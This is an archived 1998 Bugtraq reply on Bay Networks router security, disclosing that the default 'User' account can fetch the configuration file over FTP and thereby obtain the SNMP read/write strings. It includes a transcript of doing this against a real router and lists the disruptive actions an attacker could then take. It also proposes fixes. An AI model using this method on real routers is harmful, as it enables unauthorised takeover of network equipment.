Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
Bugtraq archives for 2nd quarter (Apr-Jun) 1998: Re: Bay Networks Security Hole

Re: Bay Networks Security Hole

Jason Ackley (jasonVIACCESS.NET)
Sun, 10 May 1998 11:02:41 -0400

On Sun, 10 May 1998, Marty Rigaletto wrote:

> vendor: bay networks
> product: bay access node/wellfleet routers

> on the machine is passworded by the administrator, however, the "User"
> account is often left untouched. While the "User" account has restricted

 This is something I mentioned to them about 1yr ago, with no word /

 Even if the box is not doing filtering and such, the 'User' Account can
be used to ftp into the Bay router (they run ftp daemons), download the
configuration file (yes, I have done this many times..), and then read it
into their Managment program, in which you will have the snmp read/write
strings to do whatever you want with! Basically if the 'User' account is
open, the router can be taken over with very little effort..Once you load
up the config file into the managment console, you could toggle T1s, down
interfaces, reset BGP tables, capture packets.. You name it.

It would be wise to make it where the 'User' account cannot ftp in, or
cannot read the contents of the flash card..

Here is a sample random-bay-router-on-the-net(IP addr changed of course):

llama:/usr/home/jason/doc# ftp
Connected to
220 WfFTP server(x12.00) ready.
Name ( User
230 User User logged in.
ftp> bin
200  Type set to I.
ftp> get config
local: config remote: config
200  PORT command successful.
150  Image data connection for 2:config (,20) (50140 bytes).
226  Binary Transfer Complete.
50140 bytes received in 2.01 seconds (24909 bytes/s)
ftp> ls
200  PORT command successful.
150  ASCII data connection for 2: (,0) (0 bytes).

 Volume - drive 2:
 Directory of 2:

File Name             Size    Date     Day      Time
config.isp           45016  08/22/97  Fri.    17:05:51
startup.cfg           7472  08/24/97  Sun.    23:31:31
asnboot.exe         237212  08/24/97  Sun.    23:31:41
asndiag.exe         259268  08/24/97  Sun.    23:32:28
debug.al             12372  08/24/97  Sun.    23:33:17
ti_asn.cfg             504  08/24/97  Sun.    23:33:31
install.bat         189114  08/24/97  Sun.    23:33:41
config               50140  04/20/98  Mon.    22:08:01

 4194304 bytes - Total size
 3375190 bytes - Available free space
 3239088 bytes - Contiguous free space

226  ASCII Transfer Complete.
ftp> quit
221 Goodbye.

I have no idea what the current firmware rev is, as my current duties have
me away from Bay products, but in this example, the firmware was 12.00 it
looks like.. (This was testing 'just now').

> All a proposed attacker would have to do is telnet to the router, login
> as "User", and issue a single command, "sho snmp community". Then adjust
> his or her snmp software to use that string and IP address, and b00m,
> sucks to be you.

 As far as I knew, the User level could not see the read/write string, but
I could be outdated..But as shown above, you can get the config file using
a standard FTP client :)

The Fix? Well, as I said , tighten down what the 'User Level' account can
do, and leave things such as ftpd turned off by default. Of course,
removing the 'User' account would be a good idea too, as not too many
people use it and even more people are not even aware of it..


Jason Ackley           jasonackley.net
UNIX Systems Consultant
     "Learn UNIX and mingle with the gods.."